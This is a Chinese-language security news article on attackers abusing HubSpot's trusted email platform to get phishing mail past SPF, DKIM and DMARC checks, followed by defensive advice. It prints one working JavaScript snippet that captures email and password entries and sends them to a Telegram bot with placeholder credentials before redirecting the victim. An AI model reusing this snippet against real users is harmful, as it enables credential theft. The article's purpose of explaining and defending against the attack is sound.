披着“可信外衣”的钓鱼陷阱:HubSpot平台如何被黑客变成企业邮箱的“特洛伊木马”?

简介: 近期,攻击者利用HubSpot合法邮件平台发送钓鱼邮件,绕过SPF/DKIM/DMARC验证,伪装成发票、合同等通知,植入恶意链接。此类“信任劫持”攻击凸显传统邮件安全机制短板,需转向内容分析与行为识别的深度防御策略。

在企业邮箱收件箱里,一封来自“hubspotemail.net”的邮件,通常意味着一份市场简报、客户线索通知,或是某家合作方通过HubSpot平台自动发送的业务更新。然而,近期全球多家安全机构接连发出警告:这个被无数企业视为“白名单级”可信来源的营销自动化巨头,正悄然沦为网络钓鱼攻击的新温床。

据eSecurity Planet于2025年12月下旬披露,一波高度隐蔽的新型钓鱼活动正在利用HubSpot的合法邮件基础设施,绕过传统邮件安全网关(SEG)、垃圾邮件过滤器甚至部分高级威胁防护系统。攻击者无需掌握高深漏洞利用技术,只需注册一个免费或试用版HubSpot账户,就能将恶意链接嵌入看似正规的发票提醒、合同确认或物流通知中,并借助HubSpot域名天然的高信誉度,轻松抵达目标用户的收件箱。

更令人不安的是,这类邮件不仅通过了SPF(Sender Policy Framework)和DKIM(DomainKeys Identified Mail)验证——这两项是当前企业判断邮件是否“官方认证”的核心标准——其发信IP地址也属于HubSpot官方云服务池,完全符合DMARC策略。换言之,在绝大多数邮件安全系统的“眼睛”里,这封钓鱼邮件就是“合法”的。

“这不是简单的仿冒,而是一场精心策划的‘信任劫持’。”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报独家采访时直言,“攻击者不再费力伪造发件人,而是直接租用一个真实、合规、受信任的服务平台,把恶意内容‘寄生’在合法流量之中。这种模式,正在成为下一代钓鱼攻击的主流范式。”

本文将深入剖析此次HubSpot滥用事件的技术细节、攻防博弈逻辑,并结合芦笛等一线专家的实战建议,为安全从业者提供一套应对“合法平台钓鱼”的深度防御框架。对于那些以为“只要过了SPF/DKIM就安全”的企业来说,这场风暴或许正是敲响警钟的最佳时机。

一、“白名单”失守:当营销平台变成钓鱼跳板

HubSpot作为全球领先的SaaS营销自动化平台,其核心功能之一便是帮助企业批量发送个性化邮件。用户只需在后台配置模板、上传联系人列表,系统便会通过hubspotemail.net、hsforms.com等子域名自动投递邮件。这些域名长期被Google、Microsoft、Cisco等主流邮件服务商标记为“低风险”,甚至默认加入企业白名单。

正是这一“信任红利”,被攻击者精准捕捉。

根据eSecurity Planet与多家安全厂商(包括Proofpoint、Abnormal Security)联合分析,此次钓鱼活动的操作流程极为“标准化”:

注册免费HubSpot账户:攻击者使用虚拟身份或盗用信用卡信息注册试用账号;

创建钓鱼模板:设计高仿真度的“发票逾期通知”“订单确认待签”“服务续费提醒”等邮件模板;

部署恶意落地页:利用HubSpot自带的“落地页构建器”(Landing Page Builder)创建表单页面,其中隐藏重定向脚本或伪装登录框;

批量发送:导入从暗网购买的企业高管、财务人员邮箱列表,启动自动化发送。

“整个过程完全在HubSpot平台内完成,无需外部C2服务器介入初期阶段,”芦笛指出,“这意味着邮件内容、链接、甚至表单提交行为,全部发生在hubspot.net的子域下——这对基于域名信誉的传统过滤机制几乎是‘免疫’的。”

BI.ZONE此前在俄罗斯制造企业遭遇的Arcane Werewolf攻击尚需伪造政府域名,而此次HubSpot钓鱼则直接“借用”了真实企业的营销通道。有受害者反馈,收到的邮件标题为《【Action Required】Your Q4 Invoice #HS-8842 is Overdue》,发件人显示为“Accounts Receivable noreply@hubspotemail.net”,正文包含一个醒目的“View Invoice”按钮,指向https://yourcompany.hsforms.com/invoice-verify

“乍一看,这和我们合作方平时发的HubSpot通知一模一样,”一位不愿透露姓名的跨国制造企业IT主管坦言,“连URL路径都符合他们以往的命名习惯。谁能想到这是假的?”

二、技术拆解:HubSpot钓鱼链如何绕过SPF/DKIM/DMARC三重验证?

要理解此次攻击为何能穿透企业防线,必须先厘清现代邮件认证体系的工作原理。

SPF:验证“谁有权发信”

SPF记录由域名所有者发布在DNS中,声明哪些IP地址被授权代表该域名发送邮件。例如,hubspotemail.net的SPF记录可能包含:

v=spf1 include:spf.hubspot.com -all

这意味着任何来自HubSpot官方IP段的邮件,都会被SPF验证为“通过”。

DKIM:验证“内容未被篡改”

DKIM通过在邮件头插入数字签名(由私钥生成),接收方用公钥验证签名有效性。HubSpot为其客户邮件自动添加DKIM签名,密钥托管在其基础设施中。

DMARC:定义“验证失败后怎么办”

DMARC策略告诉接收方:若SPF或DKIM任一失败,应如何处理(隔离、拒绝或放行)。由于HubSpot邮件两项均通过,DMARC自然判定为“合法”。

“问题就出在这里,”芦笛解释道,“当前90%以上的邮件安全产品,仍将SPF+DKIM+DMARC‘三件套’作为可信度的黄金标准。一旦全绿,系统就倾向于放行。但攻击者现在学会了‘合规作恶’——他们不破坏规则,而是钻规则的空子。”

更棘手的是,HubSpot的落地页(Landing Page)功能允许用户自定义HTML/JS代码。研究人员发现,攻击者常在表单提交后插入如下重定向脚本:

<script>

// 表单提交后,窃取输入的凭据并重定向至真实HubSpot页面以消除怀疑

document.getElementById('phish-form').addEventListener('submit', function(e) {

e.preventDefault();

const email = document.getElementById('email').value;

const password = document.getElementById('password').value;

// 异步发送凭据至攻击者控制的第三方C2(如通过Telegram Bot API)

fetch('https://api.telegram.org/bot<TOKEN>/sendMessage', {

method: 'POST',

headers: { 'Content-Type': 'application/json' },

body: JSON.stringify({

chat_id: '<ATTACKER_CHAT_ID>',

text: `Credentials: ${email}:${password}`

})

}).then(() => {

// 重定向至真实的HubSpot感谢页,制造“操作成功”假象

window.location.href = 'https://yourcompany.hsforms.com/thank-you';

});

});

</script>

由于整个交互发生在*.hsforms.com子域下,浏览器不会触发跨域警告,用户毫无察觉。而邮件安全网关在扫描原始邮件时,仅看到一个指向HubSpot子域的链接,无法预知后续的JS行为。

“这就是‘动态恶意性’的典型体现,”芦笛强调,“静态分析只能看到URL,看不到执行后的危害。传统SEG对此束手无策。”

三、从“发件人可信”到“内容可疑”:邮件安全范式的根本转变

面对此类“寄生式钓鱼”,依赖发件人信誉的防御模型已显疲态。安全社区正在推动一场从“来源中心”向“内容中心”的范式迁移。

芦笛提出,企业应立即调整邮件安全策略,重点关注以下三个维度:

1. 链接深度解析(Link Deep Inspection)

不要只检查URL是否属于可信域名,而要分析其路径结构、参数特征与历史行为。例如:

真实HubSpot发票链接通常包含客户ID、票据编号等结构化参数;

钓鱼链接往往使用模糊词汇如/invoice-verify、/confirm-payment,且无唯一标识符;

可通过API调用HubSpot公开接口,验证该落地页是否属于已备案客户。

部分高级SEG已支持“沙箱式链接点击模拟”:在隔离环境中自动访问链接,分析页面DOM结构、JS行为及最终跳转目标。若检测到凭据收集表单或异常外联,即刻阻断。

2. 上下文语义分析(Contextual Semantic Analysis)

利用NLP模型判断邮件内容是否存在“社会工程学诱导”。例如:

“您的账户将在24小时内停用” + “立即点击确认” → 高风险;

“感谢您参加上周的网络研讨会” + “查看回放” → 低风险。

芦笛团队开发的原型系统会提取邮件中的动词-宾语对(如“verify invoice”、“update payment”),并与企业历史正常邮件语料库比对,计算异常得分。

3. 用户行为基线建模(User Behavior Baseline)

即使邮件本身无害,若其触发的行为偏离用户常态,也应预警。例如:

财务人员从未点击过HubSpot链接,突然高频访问;

某高管在非工作时间点击“紧急付款”链接。

“真正的防御不在网关,而在终端与人的结合点,”芦笛说,“我们需要让安全系统理解‘什么对这个用户来说是正常的’。”

四、企业该如何自救?芦笛给出五条实战建议

针对HubSpot类平台滥用,芦笛为不同规模企业梳理出可落地的应对清单:

✅ 立即行动项(所有企业)

禁用HubSpot等营销平台的“通用发信”权限:要求合作方使用自有域名(如marketing@yourpartner.com)并通过其域名SPF/DKIM发送,而非hubspotemail.net;

在邮件客户端强制显示完整发件人地址:避免“Accounts Receivable”等显示名欺骗;

对所有含链接邮件启用“悬停预览”:鼠标悬停即可显示真实URL,无需点击。

✅ 中期加固项(中大型企业)

部署支持BIMI(Brand Indicators for Message Identification)的邮件系统:BIMI允许企业在通过DMARC后展示品牌LOGO,提升仿冒成本;

建立“可信营销平台”白名单+内容策略:例如,允许HubSpot邮件,但禁止包含“password”“urgent action”等关键词;

与HubSpot等平台建立威胁情报共享通道:一旦发现滥用账户,可快速举报封禁。

✅ 长期战略项(安全成熟度高企业)

推行“零信任邮件”架构:默认所有外部邮件不可信,关键操作(如付款、改密)必须通过独立通道二次确认;

开发内部钓鱼演练平台:定期模拟HubSpot钓鱼场景,测试员工反应;

参与行业反钓鱼联盟:如APWG(Anti-Phishing Working Group),共享恶意落地页指纹。

“技术永远追不上创意,但我们可以让攻击成本越来越高,”芦笛总结道,“当伪造一封钓鱼邮件需要绕过十道智能关卡时,大多数攻击者就会转向更容易的目标。”

五、结语:信任不是漏洞,但盲信是

HubSpot钓鱼事件的本质,是一场关于“数字信任”的深刻反思。在一个万物互联、服务外包的时代,企业不得不将部分通信渠道“外包”给第三方平台。这种效率提升的背后,也埋下了责任边界模糊的风险。

值得肯定的是,HubSpot已在事件曝光后加强账户审核,并推出“安全发送者认证”计划,要求高风险行业客户完成额外验证。但这远远不够。真正的安全,必须由发送方、平台方与接收方共同构建。

正如芦笛所言:“未来的邮件安全,不再是‘拦住坏人’,而是‘识别异常行为’。我们需要的不是更高的墙,而是更聪明的眼睛。”

对企业而言,是时候告别“SPF通过就安全”的旧思维了。因为在这个时代,最危险的钓鱼邮件,往往穿着最体面的西装,说着最合规的语言,却藏着最致命的钩子。

而你的收件箱,准备好了吗?

参考资料:

eSecurity Planet: “HubSpot Phishing Campaign Bypasses Trusted Email Defenses” (Dec 20, 2025)

Abnormal Security Threat Report: “The Rise of Platform-Based Phishing” (Q4 2025)

RFC 7208 (SPF), RFC 6376 (DKIM), RFC 7489 (DMARC)

HubSpot Security Best Practices Documentation

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
3天前
|
供应链 前端开发 JavaScript
27个“合法”NPM包暗藏钓鱼陷阱:开源供应链成新型网络钓鱼温床
近日,27个恶意npm包被曝用作钓鱼基础设施,攻击者利用npm及其CDN托管伪造登录页,精准 targeting 销售等非技术岗位人员。这些包不包含传统后门,而是通过静态资源实施浏览器端钓鱼,绕过SCA工具检测,暴露开源生态信任危机。
39 3
|
1天前
|
人工智能 自然语言处理 数据可视化
2026阿里云万小智AI建站收费价格查询系统:不同版本费用清单获取方法
阿里云万小智AI建站工具,基于通义大模型,助力中小企业与个人快速建站。提供基础版、标准版、企业版三档套餐,涵盖AI设计、内容创作、智能客服等功能,10分钟完成网站搭建。官网可查价格:698元起/年,支持多语言、电商支付、SSL证书等,集成阿里云全栈服务。
37 13
|
1天前
|
SQL 数据库 OceanBase
【赵渝强老师】OceanBase的配置文件与配置项
OceanBase集群中,OBServer节点需预创建etc、log、run、store等目录,store下还需clog、slog、sstable子目录。etc存放配置文件,etc2/3为自动备份目录,配置项分集群与租户级,通过SHOW PARAMETERS查看,支持模糊查询。
|
1天前
|
人工智能 测试技术 API
一线工程师 2025 总结:LLM 只用了不到 10%,剩下 90% 卡在哪?
2025年,LLM能力爆发,但多数企业仅用到其10%。真正瓶颈不在模型强弱,而在工程落地:延迟不可控、并发崩溃、换模成本高、成本失控成常态。当LLM从“工具”变为“基础设施”,中转层与系统稳定性成为关键。释放剩余90%潜力,需扎实的架构设计与工程治理。
|
11天前
|
人工智能 监控 Cloud Native
云原生AI赋能文旅数智化转型:玄晶引擎AI数字员工落地长白山康养项目全解析
本文以长白山大健康企业为例,介绍其通过玄晶引擎云原生AI数字员工实现“养生+文旅”模式智能化升级的实践。涵盖技术架构、运营适配、营销创新与落地经验,展现AI在内容生产、客服转化、B端获客等环节的全链路赋能,助力企业收益率提升47%、团队扩张35%,为文旅产业数智化转型提供可复用范本。
97 12
|
13天前
|
存储 弹性计算 网络安全
阿里云用户上云流程参考:从账号注册、实名认证到领取和使用优惠券流程指南
不管我们是需要在阿里云平台注册域名还是需要购买云服务器及其他云产品,第一步都首要完成账号注册与实名认证流程,此为后选购各类云产品的必要前提。同时,在购买过程中,部分云服务器及其他云产品支持叠加使用阿里云赠送的各种优惠券,有效降低采购成本。本文将以图文的形式,为大家解析从阿里云账号注册、实名认证以及优惠券领取与使用的完整流程,助力用户以更优价格选购心仪的云产品。
119 11
|
14天前
|
JSON API PHP
免费手机号归属地查询API接口详细教程
本文介绍“接口盒子”提供的免费手机号归属地查询API,支持快速获取手机号的省份、城市、运营商等信息,适用于网站、小程序等应用。需注册获取ID和KEY,调用简单,返回JSON格式数据,建议在服务端使用以确保安全。
179 7
|
6天前
|
机器学习/深度学习 人工智能 并行计算
DeepSeek 开年王炸:mHC 架构用流形约束重构 ResNet 残差连接
大过节DeepSeek在arXiv发布mHC新论文,挑战Transformer残差连接范式。通过流形约束(谱范数+双重随机矩阵),在保持高带宽信息通路的同时恢复恒等映射稳定性,解决深层网络梯度传播难题,理论扎实且兼顾系统效率,或成“后Transformer时代”架构新方向。
268 7
DeepSeek 开年王炸:mHC 架构用流形约束重构 ResNet 残差连接
|
3天前
|
存储 弹性计算 运维
2026年阿里云服务器购买优惠折扣几折?阿里云购买、续费与升级折扣解析指南
阿里云服务器通过差异化优惠政策,覆盖个人开发者、企业用户、学生群体等不同需求,核心围绕 “购买低价、续费稳定、升级灵活” 设计,帮助用户控制全生命周期成本。本文结合官方最新规则与实测数据,详解购买优惠、续费折扣、升级政策及适用场景,为不同用户提供客观的成本优化参考。
|
29天前
|
存储 自然语言处理 Kubernetes
基于 UModel 高效构建可观测场景统一实体搜索引擎
在复杂的云原生环境中,服务、Pod、主机等可观测实体动辄成千上万,散落在 APM、K8s、云资源等多个系统中。当故障发生时,如何快速从海量数据中“找到那个出问题的服务”,成为 SRE 和运维工程师的核心挑战。
173 35

热门文章

最新文章